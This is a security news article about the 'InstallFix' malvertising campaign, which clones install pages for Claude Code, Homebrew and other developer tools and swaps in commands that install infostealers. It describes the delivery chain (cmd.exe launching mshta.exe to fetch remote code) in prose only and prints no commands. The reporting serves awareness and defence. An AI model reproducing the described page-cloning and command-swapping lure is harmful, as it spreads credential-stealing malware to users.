A new variant of the ClickFix attack relies on cloned webpages for popular development tools to distribute information-stealing malware, Push Security reports.
As part of the campaign, dubbed InstallFix, threat actors rely on malvertising to lure victims to legitimate-looking malicious installation pages on which install commands have been replaced with rogue ones.
One variant of the attack abuses users’ interest in Anthropic’s Claude Code CLI tool, using malicious advertisements distributed exclusively through Google Ads, increasing the visibility of the cloned page via sponsored search results.
The cloned page is a near-pixel-perfect replica of the legitimate one. The install one-liner on it, however, points to an attacker-controlled server that distributes an infostealer, instead of fetching the install script for Claude Code.
“Unless you’re carefully reading the URL embedded in the install one-liner (and let’s be honest, almost nobody does these days), the page is indistinguishable from the real one,” Push Security notes.
Once the victim triggers the execution chain, cmd.exe spawns mshta.exe to retrieve and run code from a remote server, resulting in an Amatera Stealer infection.
“We saw different sites executing identical binaries, further indicating that these are part of a single attacker campaign,” Push Security says.
The cybersecurity firm also notes that threat actors are abusing legitimate domains such as Cloudflare Pages, Squarespace, and Tencent EdgeOne to host malicious content and blend with normal web traffic.
Threat actors were also seen hosting malicious terminal commands on public pages on claude.ai, distributing the Cuckoo infostealer via clones of the Homebrew website, hosting rogue OpenClaw installers in GitHub repositories, and distributing malware through NPM packages mimicking Claude Code.
“But this isn’t just a Claude problem — any tool or site that is likely to get clicks, and can be easily cloned, is a potential target for malvertising and impersonation,” Push Security notes.
Related: Microsoft Warns of ClickFix Attack Abusing DNS Lookups
Related: Malicious Chrome Extension Crashes Browser in ClickFix Variant ‘CrashFix’
Related: Hackers Weaponize Claude Code in Mexican Government Cyberattack
Related: Infostealer Malware Delivered in EmEditor Supply Chain Attack
